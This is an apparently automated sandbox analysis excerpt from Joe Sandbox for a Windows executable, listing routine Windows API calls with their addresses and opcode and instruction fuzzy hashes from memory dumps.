                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateWindow
                                                                              • String ID:
                                                                              • API String ID: 716092398-0
                                                                              • Opcode ID: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction ID: 1d12608fc0467a25e6c73015cc4d191371d7057fe5102c86e19c90aa3d4ae925
                                                                              • Opcode Fuzzy Hash: ff94722aa4050723ad3f6c96c0112c9f8192a5aa4540eb1f1ae13447e7542d04
                                                                              • Instruction Fuzzy Hash: 4CE002B2204309BFDB00DE8ADDC1DABB7ACFB4C654F844105BB1C972428275AD608BB1
                                                                              APIs
                                                                              • RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 0042DD38
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: Create
                                                                              • String ID:
                                                                              • API String ID: 2289755597-0
                                                                              • Opcode ID: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                              • Instruction ID: f0f4a7cc191af20e9b9700f54d410718858f5ac06abb37c2f1ccc41e28cff8f4
                                                                              • Opcode Fuzzy Hash: 5e59f431e7dc3fbfe634ec8590c1537f060de66ed7aab2066b747fc67b6210b1
                                                                              • Instruction Fuzzy Hash: 05E07EB2610129AF9B40DE8CDC81EEB37ADEB1D350F408016FA08D7200C274EC519BB4
                                                                              APIs
                                                                              • FindClose.KERNEL32(00000000,000000FF,0046F950,00000000,0047073F,?,00000000,00470788,?,00000000,004708C1,?,00000000,0000003C,00000000), ref: 0045412A
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseFind
                                                                              • String ID:
                                                                              • API String ID: 1863332320-0
                                                                              • Opcode ID: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                              • Instruction ID: 5eabd71f03f270c9e36328c123aabe4f760eecb17ac4c97f42f59bce307939db
                                                                              • Opcode Fuzzy Hash: e19e0392ffb8f942ef07e4f90012c062304df668bc5034957742c687a3574691
                                                                              • Instruction Fuzzy Hash: CEE065B0A04A004BCB14DF3A898425676D25FD5324F04C56AAC58CF3D6E63C84859A26
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(00493E46,?,00493E68,?,?,00000000,00493E46,?,?), ref: 004146AB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                              • Instruction ID: 3a83c41fa5c3d176b15f2666d2672a78f9af76d4247255e2ff0bda4df6ea0631
                                                                              • Opcode Fuzzy Hash: 6e76042b9040d81ea616cca6ecacd77bc76811df147480a1eef497ac36b7c045
                                                                              • Instruction Fuzzy Hash: 59E012723001199F8250CE5EDC88C57FBEDEBC966130983A6F508C7306DA31EC44C7A0
                                                                              APIs
                                                                              • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 00406F2C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FileWrite
                                                                              • String ID:
                                                                              • API String ID: 3934441357-0
                                                                              • Opcode ID: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                              • Instruction ID: 1f586823f232578dbf745533d190da316c23ef772c10fc749b20f2ce5ea51255
                                                                              • Opcode Fuzzy Hash: 6989787615dda6fb0474b9a852aed77f7455facdbde297e08749939c69554e6e
                                                                              • Instruction Fuzzy Hash: E0D05B723091117AD620955F6C44DA76BDCCBC5770F11063EB558D72C1D7309C01C675
                                                                              APIs
                                                                                • Part of subcall function 00423608: SystemParametersInfoA.USER32(00000048,00000000,00000000,00000000), ref: 0042361D
                                                                              • ShowWindow.USER32(00410660,00000009,?,00000000,0041EDB4,0042394A,00000000,00400000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00423C1C), ref: 00423677
                                                                                • Part of subcall function 00423638: SystemParametersInfoA.USER32(00000049,00000000,00000000,00000000), ref: 00423654
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: InfoParametersSystem$ShowWindow
                                                                              • String ID:
                                                                              • API String ID: 3202724764-0
                                                                              • Opcode ID: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                              • Instruction ID: 40ba6511a88705317f68f90b714cf273492cbff5df7e869aa0dea3a735aecdb5
                                                                              • Opcode Fuzzy Hash: 1489a060ee1bcc8cc48c15b27d983b014cc6d9756e6ca662c79b076239964338
                                                                              • Instruction Fuzzy Hash: 89D05E123831B03106307BB72805ACB86AC8D966AB389047BB5409B302E91E8A0A61AC
                                                                              APIs
                                                                              • SetWindowTextA.USER32(?,00000000), ref: 004242EC
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: TextWindow
                                                                              • String ID:
                                                                              • API String ID: 530164218-0
                                                                              • Opcode ID: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                              • Instruction ID: 772c2b490b6417829154bcce5d0a54014a2db275ddfc333997dbbca6f26d49c5
                                                                              • Opcode Fuzzy Hash: ec54067a7769377eb2baeee9a4c2879ed8266950ae1d3b96fccc382486b1e86e
                                                                              • Instruction Fuzzy Hash: 7ED05EE27011702BCB01BAED54C4AC667CC9B8825AB1940BBF904EF257C678CE4083A8
                                                                              APIs
                                                                              • KiUserCallbackDispatcher.NTDLL(?,?,00000000,?,00466F40,00000000,00000000,00000000,0000000C,00000000), ref: 0046626C
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CallbackDispatcherUser
                                                                              • String ID:
                                                                              • API String ID: 2492992576-0
                                                                              • Opcode ID: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                              • Instruction ID: a3a9c25b9c80179eca176ae0059a0aa24e3542550d9dc9bac8dced773014ab2a
                                                                              • Opcode Fuzzy Hash: 1170af52fdfa1b22d402febd08e71c9ecbcd6356f79449625b478cc807a9fefe
                                                                              • Instruction Fuzzy Hash: 0ED09272210A109F8364CAADC9C4C97B3ECEF4C2213004659E54AC3B15D664FC018BA0
                                                                              APIs
                                                                              • GetFileAttributesA.KERNEL32(00000000,00000000,00450C2B,00000000), ref: 0042CCFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AttributesFile
                                                                              • String ID:
                                                                              • API String ID: 3188754299-0
                                                                              • Opcode ID: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                              • Instruction ID: cee2652a42bb6fa335edebfce0b7cce520d77b1cbd3538a4821e8cc024acaa82
                                                                              • Opcode Fuzzy Hash: 01dbdc36424fec664e934353753d4045270514496262de1bfab72665a96f96e3
                                                                              • Instruction Fuzzy Hash: 66C08CE03222001A9A1065BD3CC911F06C8892833A3A41F37B438E32D2E23E88266028
                                                                              APIs
                                                                              • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,0040A8D4,0040CE80,?,00000000,?), ref: 00406EE5
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CreateFile
                                                                              • String ID:
                                                                              • API String ID: 823142352-0
                                                                              • Opcode ID: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                              • Instruction ID: fbce42704b7dd2fd8be74a622cf743b4adaa06f64be9adac3ea2875d17ee2119
                                                                              • Opcode Fuzzy Hash: 7f8aa10a2b0ebcd99225cbdae7d816ffd0c8159e943a954a1b877cbd8b688861
                                                                              • Instruction Fuzzy Hash: EAC048A13C130032F92035A60C87F16008C5754F0AE60C43AB740BF1C2D8E9A818022C
                                                                              APIs
                                                                              • SetCurrentDirectoryA.KERNEL32(00000000,?,0049627E,00000000,00496451,?,?,00000005,00000000,00496485,?,?,00000000), ref: 004072BB
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CurrentDirectory
                                                                              • String ID:
                                                                              • API String ID: 1611563598-0
                                                                              • Opcode ID: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                              • Instruction ID: c18bf430a4858a09d5fd0626d157798880aaaa8ea81a5298b6cf69089c3012d4
                                                                              • Opcode Fuzzy Hash: b7f7ac57d488892482cd1d27060886e150623f3d0701accf4d1aa85b87094221
                                                                              • Instruction Fuzzy Hash: B0B012E03D161B27CA0079FE4CC191A01CC46292163501B3A3006E71C3D83CC8080514
                                                                              APIs
                                                                              • SetEndOfFile.KERNEL32(?,?,0045BA62,00000000,0045BBED,?,00000000,00000002,00000002), ref: 0044FF93
                                                                                • Part of subcall function 0044FD14: GetLastError.KERNEL32(0044FB30,0044FDD6,?,00000000,?,004962F0,00000001,00000000,00000002,00000000,00496451,?,?,00000005,00000000,00496485), ref: 0044FD17
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorFileLast
                                                                              • String ID:
                                                                              • API String ID: 734332943-0
                                                                              • Opcode ID: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                              • Instruction ID: f3a0f6ff35c414572697f21b60dc386cc542920b113ac52c9a1142ed5c58418d
                                                                              • Opcode Fuzzy Hash: 40f744221a1c0ad34bc3dfd7c8217ba7111344780b163017895d6acbe08c1ff7
                                                                              • Instruction Fuzzy Hash: 54C04CA1B0010147DF00AAAED5C1A0763D85E4E2093144076B504CF206D6A9D8084A24
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(?,0042E335), ref: 0042E328
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode
                                                                              • String ID:
                                                                              • API String ID: 2340568224-0
                                                                              • Opcode ID: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                              • Instruction ID: 885b9387dc4d85ef1a6bcc41b3ac28186c42b97ac018e1411ad6f8b1d6607996
                                                                              • Opcode Fuzzy Hash: 15eed7d30ca8f87603f8d2fb4c6016cac4064a0446a0c9a22a0947d8b3773134
                                                                              • Instruction Fuzzy Hash: CFB09B7770C6006DB705DA95B45192D63E4D7C47203E14577F400D3580D93C58014918
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                              • Instruction ID: 444a78761fbc6a727879d8c4239369b0bde5fc0390465f01f64749401816922a
                                                                              • Opcode Fuzzy Hash: e610db4be5d09209adc61dd78440b7b0e9dd7066f593708e54d36c975471eb1e
                                                                              • Instruction Fuzzy Hash: CDA002756015049ADE04A7A5C849F662298BB44204FC915F971449B092C53C99008E58
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                              • Instruction ID: 72cb28a769613da0e12d57a8c8ff31d21ec4f608c404a89b028e4eccd5103e64
                                                                              • Opcode Fuzzy Hash: c6c06974965794d864392915e7a6b680c3d3b0c6831c6a02358c4469e8de6b1c
                                                                              • Instruction Fuzzy Hash: 87518570E041459FEB01EFA9C482AAEBBF5EB49304F51817BE500E7351DB389D46CB98
                                                                              APIs
                                                                              • VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040,?,00000000,0041EDB4,?,0042389F,00423C1C,0041EDB4), ref: 0041F3F2
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: AllocVirtual
                                                                              • String ID:
                                                                              • API String ID: 4275171209-0
                                                                              • Opcode ID: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                              • Instruction ID: b55a7b9a32de56e4c0cdb05f5aaeda5055a0700d8eb896d56cc2d0e0b2117302
                                                                              • Opcode Fuzzy Hash: 25741e919397043df0620f3a34db4bcef4e36b6359be59aa132e91d838a2cc50
                                                                              • Instruction Fuzzy Hash: F01148742007069BC710DF19C880B86FBE4EB98390B14C53BE9988B385D374E8598BA9
                                                                              APIs
                                                                              • GetLastError.KERNEL32(00000000,0045268D), ref: 0045266F
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorLast
                                                                              • String ID:
                                                                              • API String ID: 1452528299-0
                                                                              • Opcode ID: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                              • Instruction ID: 0a85f8cb76b48f87276e85e1927624e59cb24adfaf40460ac6081df001af0a23
                                                                              • Opcode Fuzzy Hash: 6f78eaee849ee638804850479d3cdbdf5400ab5c1e67a59323e7cfb7155a44e8
                                                                              • Instruction Fuzzy Hash: BD0170356046446F8B10DF699C404EEF7F8DB4A3207208277FC64D3352DB745D099664
                                                                              APIs
                                                                              • VirtualFree.KERNEL32(?,?,00004000,?,?,?,000023E4,000063E7,00401973), ref: 00401766
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: FreeVirtual
                                                                              • String ID:
                                                                              • API String ID: 1263568516-0
                                                                              • Opcode ID: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                              • Instruction ID: 2f1b12c935ae24389c3dd8db424781fbbcf1746defe36878ea7ad6421184be39
                                                                              • Opcode Fuzzy Hash: 827a1b883538dfed4e56bd6d9186317dde9c02c408e4bc47c040c509ac29fb8c
                                                                              • Instruction Fuzzy Hash: 0C0170766043108FC3109F29DCC4E2677E8D780378F05413EDA84673A0D37A6C0187D9
                                                                              APIs
                                                                              Memory Dump Source
                                                                              • Source File: 00000001.00000002.2938627795.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                              • Associated: 00000001.00000002.2938601473.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938724529.0000000000498000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938759392.0000000000499000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938785591.000000000049A000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                              • Associated: 00000001.00000002.2938819433.00000000004AA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_1_2_400000_6hvZpn91O8.jbxd
                                                                              Similarity
                                                                              • API ID: CloseHandle
                                                                              • String ID:
                                                                              • API String ID: 2962429428-0
                                                                              • Opcode ID: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                              • Instruction ID: 073c3129693101c5e7833b7ffa09eca8aa7a1e81ff9bb2ce6bcaaab03392c7d4
                                                                              • Opcode Fuzzy Hash: 8a7e85c26bba006a24699feaad57dd478220a7a6e3331b9edb59fbcda9639b9f
                                                                              • Instruction Fuzzy Hash:
                                                                              APIs
